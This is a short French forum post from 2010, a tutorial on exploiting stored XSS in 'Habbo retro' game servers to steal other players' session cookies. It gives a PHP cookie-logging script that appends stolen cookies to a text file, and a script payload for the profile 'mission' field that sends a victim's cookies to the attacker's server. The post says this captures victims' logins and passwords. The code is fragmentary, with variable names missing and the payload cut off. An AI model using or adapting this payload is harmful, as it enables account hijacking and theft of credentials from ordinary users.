NiiTZ0
Admin
Messages: 26
Date d'inscription: 25/02/2010
 |  Sujet: Faille XSS Retro  Jeu 25 Fév - 19:03 | |
| Salut je vous apprendre la faille Xss dans un habboretro : Changer votre mission mettez :
Si sa s'affiche en gras le site est vulnérable sinon change de rétro Souriant
Puis dans ton compte ftp crée un ficher nommé recup.php ou dans ceci il y aura des données :
| Code: | if($cookie){
=fopen("cookies.txt","a"); // On ouvre le fichier cookis.txt
fputs(,"$cookie "); // On écrit le contenu du cookie dans le fichier
fclose();
}
<script>
opener=self;
self.close(); // ferme la fenètre
script> |
Puis changer votre mission et mettez :
| Code: | <script>window.open("http://TON-FTP/recup.php?cookie="+document |
Et entrez dans l'hôtel.
Dès que un membre du rétro clic sur votre personnage , un popup affiche avec ces : Login / Password Souriant
Tuto simple
Merci Sourire
Se tuto n'est pas de moi ! merci |
|
